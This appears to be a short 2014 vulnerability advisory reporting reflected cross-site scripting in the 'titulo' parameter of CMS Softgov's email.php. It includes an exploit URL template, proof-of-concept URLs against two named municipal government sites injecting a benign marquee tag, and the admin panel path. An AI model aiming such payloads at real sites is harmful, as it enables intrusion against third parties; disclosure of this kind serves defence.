CMS Softgov Cross Site Scripting

2014.04.24

Credit: Peixoto

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

[+] Cross Site Scripting on CMS SOFTGOV
[+] Date: 23/04/2014
[+] Risk: LOW
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.softgov.com.br/sg/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: email.php
[+] Exploit : http://host/estrutura/textounico/email.php?link=null%3Fpagina=t1&id=28&var=noticia&titulo=[XSS]
[+] PoC : http://www.camarariopardo.rs.gov.br/estrutura/textounico/email.php?link=null%3Fpagina=t1&id=28&var=noticia&titulo=<marquee>Felipe Andrian Peixoto</marquee>
http://www.camarauruana.go.gov.br/estrutura/textounico/email.php?link=null%3Fpagina=t1&id=28&var=noticia&titulo=<marquee>Felipe Andrian Peixoto</marquee>
[+] Admin Page: http://host/painel

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

CMS Softgov Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.